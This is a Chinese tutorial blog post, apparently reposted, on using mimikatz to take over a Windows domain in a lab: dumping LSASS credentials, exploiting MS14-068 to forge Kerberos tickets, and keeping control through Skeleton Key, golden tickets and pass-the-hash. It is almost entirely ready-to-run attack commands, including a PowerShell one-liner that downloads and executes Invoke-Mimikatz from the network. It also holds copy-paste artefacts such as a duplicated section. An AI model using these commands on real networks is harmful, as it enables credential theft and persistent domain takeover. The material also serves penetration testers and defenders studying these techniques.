• 内网渗透中mimikatz的使用


    0x01 简介

    mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

    0x02 测试环境

    网络资源管理模式:


    已有资源:

    域内一台主机权限
    操作系统:win7 x64
    域权限:普通用户

    0x03 测试目标

    1、获得域控权限 2、导出所有用户口令 3、维持域控权限

    0x04 测试过程

    1、获取本机信息

    mimikatz:
    
    privilege::debug
    sekurlsa::logonpasswords
    • 1
    • 2
    • 3
    • 4

    获取本机用户名、口令、sid、LM hash、NTLM hash 如图
    这里写图片描述

    2、攻击域控,获得权限

    使用ms14-068漏洞

    ms14-068.exe -u -p -s -d
    生成伪造缓存test.ccache:
    这里写图片描述
    导入伪造缓存: mimikatz:

    kerberos::ptc test.ccache
    登陆:
    
    net use \A-635ECAEE64804.TEST.LOCAL
    dir \A-635ECAEE64804.TEST.LOCALc$
    • 1
    • 2
    • 3
    • 4
    • 5

    这里写图片描述
    3、导出域(1)直接获取内存口令 mimikatz:

    privilege::debug
    sekurlsa::logonpasswords
    (2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz:
    
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full
    (3)通过powershell加载mimikatz获取口令
    
    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    (4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份(之前文章有介绍) mimikatz:
    
    lsadump::sam SYSTEM.hiv SAM.hiv持域控权限
    
    (1)Skeleton Key mimikatz:
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    privilege::debug
    misc::skeleton
    万能钥匙,可使用任意用户登陆域控
    
    net use \A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
    • 1
    • 2
    • 3
    • 4
    • 5

    4、维持域控权限

    (1)Skeleton Key mimikatz:

    privilege::debug
    misc::skeleton
    万能钥匙,可使用任意用户登陆域控
    
    net use \A-635ECAEE64804.TEST.LOCAL mimikatz /user:test
    • 1
    • 2
    • 3
    • 4
    • 5

    这里写图片描述
    (2)golden ticket mimikatz:

    lsadump::lsa /patch
    获取krbtgt的ntlmhash,如图
    这里写图片描述

    生成万能票据: mimikatz:

    kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi
    导入票据: mimikatz:
    
    kerberos::ptt test.kirbi
    登陆域控:
    
    net use \A-635ECAEE64804.TEST.LOCAL
    dir \A-635ECAEE64804.TEST.LOCALc$
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    这里写图片描述

    Tips:

    Golden Ticket不多说,自行理解
    By default, the Golden Ticket default lifetime is 10 years
    password changing/smartcard usage does not invalidate Golden Ticket;
    this ticket is not emitted by the real KDC, it’s not related to ciphering methods allowed;
    NTLM hash of krbtgt account is never changed automatically.
    (3)Pass-The-Hash mimikatz:

    sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

    这里写图片描述

    5、补充

    登陆域控,刷新扫雷记录,留下名字;D mimikatz:

    minesweeper::infos
    如图

  • 相关阅读:
    设计模式天天练。
    系统资料库msdb置疑或者不可用的解决方法
    依赖注入IOC
    重载、重写、隐藏的区别
    ASP.NET中的HttpWorkerRequest对像及其应用
    ASP.NET的错误处理机制
    Web.Config
    asp.net 2.0页面生命周期
    FileUpLoad控件上传大容量文件
    大文件上传
  • 原文地址:https://www.cnblogs.com/lzkalislw/p/12841588.html
Copyright © 2020-2023  润新知